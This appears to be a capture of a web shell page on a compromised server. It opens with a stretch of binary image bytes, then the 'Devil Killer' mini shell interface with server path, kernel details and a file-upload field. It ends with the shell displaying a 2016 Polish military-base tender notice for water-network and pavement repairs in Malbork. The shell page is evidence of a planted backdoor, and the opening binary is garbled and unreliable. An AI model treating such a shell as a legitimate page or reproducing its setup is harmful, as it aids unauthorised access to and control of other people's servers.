JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160411/84450-N-2016.html

<p class="kh_header"><b>Malbork: Remont sieci wodociągowej, kanalizacyjnej i nawierzchni utwardzonej                        w kompleksie wojskowym przy ul. Jagiellońskiej administrowanym przez 22 Bazę Lotnictwa Taktycznego w Malborku</b><br>
<b>Numer ogłoszenia: 84450 - 2016; data zamieszczenia: 11.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 22 Baza Lotnictwa Taktycznego , ul. 17 Marca 20, 82-200 Malbork, woj. pomorskie, tel. 261 536 713, 261 536 216,, faks 261 536 275, 261 536 713.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.22blot.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont sieci wodociągowej, kanalizacyjnej i nawierzchni utwardzonej                        w kompleksie wojskowym przy ul. Jagiellońskiej administrowanym przez 22 Bazę Lotnictwa Taktycznego w Malborku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu sieci wodociągowej, kanalizacyjnej oraz naprawa nawierzchni w kilku lokalizacjach. Realizacja przedmiotu umowy wykonywana będzie w czynnym obiekcie. Wykonawca zobowiązany jest uzgodnić harmonogram prowadzenia prac z użytkownikiem obiektu.Szczegółowy zakres rzeczowy robót w tym robót towarzyszących i tymczasowych określają załączniki:
1)	Specyfikacja techniczna wykonania i odbioru robót,
2)	Przedmiar robót, 
3)	Ponadto szczegółowe warunki realizacji zamówienia określa Projekt umowy.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.33.24.00-7, 45.11.00.00-1, 45.23.30.00-9, 45.23.32.22-1, 45.23.32.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Zamawiający wymaga wniesienia wadium. 
2. Ustala się wadium dla przedmiotu zamówienia w wysokości:  
a) dla części nr 1 - 2.900,00 zł (słownie: dwa tysiące dziewięćset 00/100 złotych)
b) dla części nr 2 - 1.800,00 zł (słownie: jeden tysiąc osiemset 00/100 złotych) 
Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie: 
1) w pieniądzu, przelewem na rachunek bankowy Narodowy Bank Polski Oddział Okręgowy Gdańsk 
nr  Konta  29 1010  1140  0173  1413  9120  1000  z  adnotacją  
wadium  - Remont sieci wodociągowej, kanalizacyjnej i nawierzchni utwardzonej w kompleksie wojskowym przy ul. Jagiellońskiej administrowanym przez 22 Bazę Lotnictwa Taktycznego w Malborku- Nr sprawy ZP/42/IV/2016/NJ, część
2)  w  poręczeniach  bankowych  lub  poręczeniach  spółdzielczej  kasy  oszczędnościowo  -  kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym, 
3) w gwarancjach bankowych,  
4) w gwarancjach ubezpieczeniowych  
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 
listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, 
poz. 275)  
2.  Za  termin  wniesienia  wadium  w  formie  przelewu  pieniężnego  przyjmuje  się  termin  uznania  na rachunku zamawiającego.  
3. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46. 
4.  Wadium  wnoszone  w  pieniądzu  wpłaca  się  przelewem  na  rachunek  bankowy:  Narodowy Bank Polski Oddział Okręgowy Gdańsk nr Konta 29 1010 1140 0173 1413 9120 1000 z adnotacją wadium - Remont sieci wodociągowej, kanalizacyjnej i nawierzchni utwardzonej w kompleksie wojskowym przy ul. Jagiellońskiej administrowanym przez 22 Bazę Lotnictwa Taktycznego w Malborku. , część
-  Nr sprawy ZP/42/IV/2016/NJ   
5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
6. Wadium wniesione w pieniądzu należy złożyć najpóźniej na dzień przed terminem otwarcia ofert. 
Przy  czym  za  termin  wniesienia  wadium  w  formie  pieniężnej  przyjmuje  się  termin  uznania  na 
rachunku bankowym zamawiającego. 
7.  Wadium  wniesione  w  pieniądzu,  zostanie  zwrócone  wraz  z  odsetkami  wynikającymi z  umowy rachunku  bankowego,  na  którym  było  ono  przechowywane,  pomniejszone  o  koszty  prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. 
8. Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem z ofertą                
w osobnej kopercie natomiast potwierdzoną kopię tego dokumentu należy wpiąć do oferty lub złożyć 
w kasie w siedzibie Zamawiającego bud. Nr 1 I piętro - kasa czynna w dni powszednie: poniedziałek, 
wtorek, czwartek, piątek w godzinach 11:00 - 14:00. 
9.  Polisa,  poręczenie,  gwarancja  lub  inny  dokument  stanowiący  formę  wadium  winno  zawierać 
stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium 
zgodnie  z  warunkami  specyfikacji  istotnych  warunków  zamówienia,  następuje  jego  bezwarunkowa wypłata  bez  jakichkolwiek  zastrzeżeń  ze  strony  gwaranta  /  poręczyciela.  Niedopuszczalny  jest również  zapis  żądający  potwierdzenia  przez  notariusza  lub  bank,  że  podpisy  na  żądaniu  do zapłaty  zostały  złożone  przez  osoby  uprawnione  do  zaciągania  zobowiązań  majątkowych Zamawiającego.
10. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium 
wykonawca  zostanie  wykluczony  z  udziału  w  postępowaniu,  a  jego  oferta  podlegać  będzie 
odrzuceniu. 
11.  Zamawiający  zwróci  niezwłocznie  wadium  wszystkim  wykonawcom  po  wyborze 
najkorzystniejszej  oferty  lub  unieważnieniu  postępowania,  z  wyjątkiem  wykonawcy,  którego  oferta zostanie wybrana jako najkorzystniejsza. 
12.  Wykonawcy,  którego  oferta  zostanie  wybrana  jako  najkorzystniejsza,  Zamawiający  zwróci 
wadium niezwłocznie po zawarciu umowy. 
13. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed 
upływem terminu składania ofert. 
14. Zamawiający zatrzymuje wadium wniesione w postępowaniu, w sytuacji zaistnienia przesłanek 
art. 46 ust. 4a i 5 ustawy Pzp, jeżeli Wykonawca: 
- w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po 
jego  stronie,  nie  złożył  dokumentów  lub  oświadczeń  o  których  mowa  w  art.  25  ust.  1, 
pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w 
art. 24 ust. 2 pkt. 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził 
zgody na  poprawienia  omyłki,  o  której  mowa  w  art.  87  ust.  2  pkt.  3, co  powodowało  brak 
możliwości  wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej, 
- którego  oferta  została  wybrana  odmawia  podpisania  umowy  na  warunkach  określonych 
w ofercie, nie wniósł zabezpieczenia należytego wykonania umowy lub zawarcie umowy stało 
się niemożliwe z przyczyn leżących po stronie wykonawcy. 
15. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46 
Prawa zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków wymaganych przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków wymaganych przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków wymaganych przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków wymaganych przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków wymaganych przez Zamawiającego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Wypełniony Formularz ofertowy , b)	Wypełniony Kosztorysy ofertowe zawierający ceny jednostkowe zgodnie z Rozdziałem 12 niniejszej SIWZ , c)	Informację o części zamówienia, którą Wykonawca zamierza powierzyć podwykonawcom, zgodnie z art. 36 ust. 4 ustawy , d)	Pełnomocnictwo osób podpisujących ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych , a)	Dokument potwierdzający wniesienie wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - termin udzielonej gwarancji i rękojmi - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający wymaga, aby wybrany Wykonawca zawarł z nim umowę na warunkach określonych w Projekcie umowy stanowiącym załącznik nr 6 do SIWZ.
2.	Zamawiający zastrzega sobie, iż ostateczna treść umowy w stosunku do projektu umowy może ulec zmianie, jednakże wyłącznie w zakresie nie zmieniającym istotnych warunków złożonej oferty i SIWZ.
3.	Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych (tj.: Dz. U. z 2015r.,                   poz. 2164) przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w stosunku do treści oferty w zakresie: 
3.1.	Co do terminów wykonania i odbioru robót, w następujących przypadkach:
a)	z powodu działania siły wyższej uniemożliwiającej zachowanie terminu wykonania prac,
b)	z powodu ujawnienia się wad projektowych powodujących wstrzymanie prac do czasu ich usunięcia, 
c)	z powodu konieczności wykonania zamówień dodatkowych, których nie można było przewidzieć w chwili zawarcia umowy,
d)	z powodu zmian prawa o charakterze bezwzględnie obowiązującym powodujących konieczność wydłużenia procesu budowlanego (dodatkowe czynności prawne i faktyczne nakazane prawem nie występujące w dacie zawarcia umowy, chyba, że ww. zmiany prawa winny być znane stronom w sytuacji odłożonego ich wejścia w życie - vacatio legis,
e)	z powodu zmniejszenia zakresu robót budowlanych objętych umową,
f)	z powodu szczególnie niesprzyjających warunków atmosferycznych,
g)	w przypadku wykopalisk archeologicznych uniemożliwiających wykonywanie robót,
h)	w przypadku znalezienia na terenie budowy przedmiotów wybuchowych i niebezpiecznych pochodzenia wojskowego, których termin usuwania będzie miał wpływ na termin realizacji robót,
i)	w przypadku opóźnienia w uzyskaniu stosownych decyzji administracyjnych lub uzgodnień 
z przyczyn niezależnych od Wykonawcy,
j)	w przypadku opóźnienia w dostawie z przyczyn nie leżących po stronie Wykonawcy materiałów niezbędnych do realizacji robót,
k)	w przypadku wstrzymania robót lub przerwy w realizacji z przyczyn nie zależnych 
od Zamawiającego i do Wykonawcy
3.2.	Co do zakresu robót objętych umową w przypadku, gdy ich wykonanie w całości lub części stanie się zbędne Zamawiającemu z jakiegokolwiek powodu albo stan wypłacalności Zamawiającego spowoduje konieczność ich zaniechania.
3.3.	Co do oznaczenia stron, wyłącznie w wyniku dozwolonego w myśl ustawy Prawo zamówień publicznych następstwa prawnego albo zmiany nazwy lub innego oznaczenia strony (firmy) wynikającego z prawa albo dozwolonych prawem czynności powodujących taką zmianę.
3.4.	Co do wysokości wynagrodzenia:
a)	w przypadku zastosowania zamiennych rozwiązań technologicznych tańszych lub droższych przez  obniżenie lub podwyższenie wynagrodzenia,
b)	z powodu zmniejszenia zakresu robót budowlanych objętych umową - w tym przypadku ulega zmniejszeniu wynagrodzenie Wykonawcy na podstawie Protokołu konieczności. Podstawą do oszacowania wartości jest kosztorys załączony do umowy.
3.5.	zmiany projektanta lub kierownika budowy na wniosek Wykonawcy, pod warunkiem, 
że osoba wskazana do przejęcia obowiązków kierownika, będzie posiadała przygotowanie 
co najmniej równe osobie dotychczas pełniącej tę funkcję oraz będzie spełniała wymogi określone w specyfikacji istotnych warunków zamówienia, 
3.6.	zmiany w zakresie podwykonawstwa (sposobu realizacji zamówienia) - w przypadku chęci powierzenia części/całości zakresu Podwykonawcy pomimo braku wskazania jego w ofercie, lub w przypadku wskazania Podwykonawców w szczególności Podwykonawca wadliwie wykonuje umowę lub zaprzestał jej wykonywania lub w razie upadłości/likwidacji Podwykonawcy - w tym Podwykonawców  na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem, że nowy Podwykonawca wykaże spełnianie warunków 
w zakresie nie mniejszym niż wymagane w SIWZ, zmianie również podlega zakres prac zleconych Podwykonawcy
3.7.	istotnych zmian w przepisach ustawowych i aktach wykonawczych związanych 
z przedmiotem umowy, które nastąpiły po dniu podpisania umowy,
3.8.	ograniczenia przedmiotu umowy, w szczególności w przypadku kiedy Zamawiający nie mógł takiej sytuacji przewidzieć, 
3.9.	Zmiany terminu wykonania przedmiotu umowy, o którym mowa w § 3 ust.1, oraz z zastrzeżeniem pkt. 4 i 5w następującym zakresie:
- jeżeli umowa nie może być wykonana w terminie z przyczyn leżących po stronie Zamawiającego,
- jeżeli umowa nie może być wykonana w terminie z przyczyn niezawinionych przez Wykonawcę,
- działania siły wyższej, z zastrzeżeniem pkt. 7;
- działania osób trzecich albo innych zdarzeń, które uniemożliwiają wykonanie części lub całości zobowiązań wynikających z umowy w terminie lub mogących negatywnie wpływać na jakość wykonywanych robót,
- konieczności wykonania dodatkowych uzgodnień, badań, ekspertyz, analiz itp.,
- ujawnienia w trakcie robót urządzeń, elementów instalacji, konstrukcji, których istnienie lub lokalizacja nie wynika z dokumentacji robót,
- konieczności wykonania zamówień dodatkowych,
- wstrzymania robót lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego,
- nieterminowego przekazania terenu budowy przez Zamawiającego z przyczyn niezależnych od Wykonawcy
4.	W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy z przyczyn, 
o których mowa w ust. 3, Wykonawca zobowiązany jest do niezwłocznego poinformowania 
o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie wskazanej zmiany. 
5.	W przypadku wystąpienia którejkolwiek z okoliczności wymienionych ust. 3 lit. a) termin realizacji przedmiotu zamówienia może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia jego wykonywania w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. Strony z powodów, jakie mogą wpływać na zmiany terminów wykonania robót, wyłączają niedogodności związane z pogodą, typową dla okresu wykonywania robót w miejscu budowy.
6.	Strony ustalają nowe terminy realizacji zamówienia, z tym że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy będzie równy okresowi przerwy lub przestoju. Dodatkowo przyczyna i okres przesunięcia terminu będzie musiał być szczegółowo uzasadniony przez Wykonawcę i zaakceptowany przez inspektora nadzoru i Zamawiającego.
7.	O wystąpieniu jakichkolwiek okoliczności mogących wpłynąć na terminowość wykonania przedmiotu umowy Wykonawca jest zobowiązany powiadomić Zamawiającego na piśmie w terminie 7 dni od dnia wystąpienia tych okoliczności pod rygorem nieuwzględnienia ich przez Zamawiającego.
8.	Za siłę wyższą, o której mowa w niniejszej umowie, Zamawiający uzna zdarzenia nadzwyczajne, zewnętrzne o charakterze nadzwyczajnym, niezależne od woli Stron po zawarciu niniejszej umowy, które nie udało się zapobiec przy zachowaniu należytej staranności, skutkujące niemożliwością prowadzenia robót, a w szczególności epidemią stwierdzoną przez uprawnione do tego organy lokalne lub państwowe, klęską żywiołową, strajkiem lub stanem wyjątkowym.
9.	Zmiana umowy powinna nastąpić w formie pisemnego aneksu sporządzonego przez Zamawiającego i podpisanego przez strony umowy, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
10.	Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.22blot.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 22 Baza Lotnictwa Taktycznego
ul. 17 Marca 20
82-200 Malbork
Sekcja zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2016 godzina 11:00, miejsce: Kancelaria Jawna
22 Baza Lotnictwa Taktycznego
ul. 17 Marca 20
82-200 Malbork.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont odcinka sieci wodociągowej wraz z przyłączami oraz remont nawierzchni betonowych w kompleksie przy ulicy Jagiellońskiej 16 przy budynkach 15 i 20 w Malborku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na remoncie odcinka sieci wodociągowej wraz z przyłączami oraz remontem nawierzchni betonowych w kompleksie przy ulicy Jagiellońskiej 16 przy budynkach 15 i 20 w Malborku. 
Zakres wykonania usługi:
1)	Roboty ziemne i rozbiórkowe:
- nacięcie betonu,
